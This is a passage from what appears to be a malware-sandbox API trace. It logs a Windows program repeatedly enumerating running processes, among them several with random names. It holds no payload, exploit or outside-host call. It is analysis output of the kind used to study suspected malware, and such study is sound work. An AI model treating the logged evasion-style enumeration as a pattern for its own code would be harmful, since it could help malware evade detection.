dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0148.881] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0148.882] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0148.883] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0148.884] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0148.885] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0148.886] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0148.887] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0148.888] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0148.889] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0148.890] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.891] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0148.892] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0148.893] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0148.894] CloseHandle (hObject=0xbc) returned 1 [0148.894] Sleep (dwMilliseconds=0x12c) [0149.208] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0149.216] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.216] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0149.217] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0149.218] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.219] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0149.219] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.220] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0149.220] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0149.221] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0149.222] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0149.222] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.223] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.224] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.225] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.225] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.226] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0149.227] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.227] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.228] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0149.229] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.231] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0149.232] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0149.233] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0149.234] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0149.235] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.236] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0149.238] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0149.239] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0149.240] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0149.241] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0149.242] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0149.243] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0149.245] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0149.246] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0149.247] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0149.248] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0149.249] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0149.251] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0149.252] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0149.253] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0149.323] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0149.325] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0149.326] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0149.327] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0149.328] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0149.329] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0149.330] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.331] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0149.332] CloseHandle (hObject=0xc4) returned 1 [0149.332] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0149.337] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.338] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0149.338] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0149.339] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.340] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0149.341] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.341] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0149.342] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0149.343] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0149.344] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0149.345] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.346] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.347] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.348] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.349] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.349] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0149.350] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.351] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.351] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0149.353] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.354] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, 